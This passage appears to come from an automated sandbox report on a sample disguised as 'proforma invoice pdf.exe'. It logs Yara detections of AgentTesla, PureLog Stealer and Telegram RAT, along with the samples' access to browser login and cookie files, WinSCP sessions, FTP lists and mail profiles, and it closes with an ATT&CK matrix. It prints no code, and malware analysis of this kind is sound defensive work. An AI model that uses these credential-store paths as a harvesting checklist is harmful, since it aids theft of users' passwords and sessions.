Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Users\user\Desktop\proforma invoice pdf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Users\user\AppData\Roaming\wTyVrj.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Users\user\AppData\Roaming\wTyVrj.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\proforma invoice pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0.2.proforma invoice pdf.exe.3e83d90.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice pdf.exe.3e59970.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice pdf.exe.3e83d90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1482009308.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000014.00000002.3913664418.0000000003295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3911170216.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3913664418.0000000003275000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3911170216.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proforma invoice pdf.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wTyVrj.exe PID: 3736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 4564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 4516, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.proforma invoice pdf.exe.72a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice pdf.exe.72a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1485785699.00000000072A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000014.00000002.3913664418.0000000003295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3911170216.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proforma invoice pdf.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wTyVrj.exe PID: 3736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 4564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 4516, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe

File opened: C:\FTP Navigator\Ftplist.txt

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\proforma invoice pdf.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Users\user\Desktop\proforma invoice pdf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\wTyVrj.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\bmBOz\bmBOz.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

Source: Yara match	File source: 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proforma invoice pdf.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wTyVrj.exe PID: 3736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 4564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 4516, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0.2.proforma invoice pdf.exe.3e83d90.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice pdf.exe.3e59970.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice pdf.exe.3e59970.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice pdf.exe.3e83d90.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1482009308.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 00000014.00000002.3913664418.0000000003295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3911170216.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.3913664418.0000000003275000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3911170216.0000000002996000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proforma invoice pdf.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wTyVrj.exe PID: 3736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 4564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 4516, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Yara detected PureLog Stealer

Source: Yara match	File source: 0.2.proforma invoice pdf.exe.72a0000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.proforma invoice pdf.exe.72a0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1485785699.00000000072A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 00000014.00000002.3913664418.0000000003295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3911170216.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3912138342.0000000002DA5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.3911447265.0000000002B7B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: proforma invoice pdf.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: wTyVrj.exe PID: 3736, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 4564, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bmBOz.exe PID: 4516, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	112 Process Injection	1 Deobfuscate/Decode Files or Information	21 Input Capture	34 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	3 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Registry Run Keys / Startup Folder	22 Software Packing	NTDS	221 Security Software Discovery	Distributed Component Object Model	21 Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	1 Clipboard Data	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
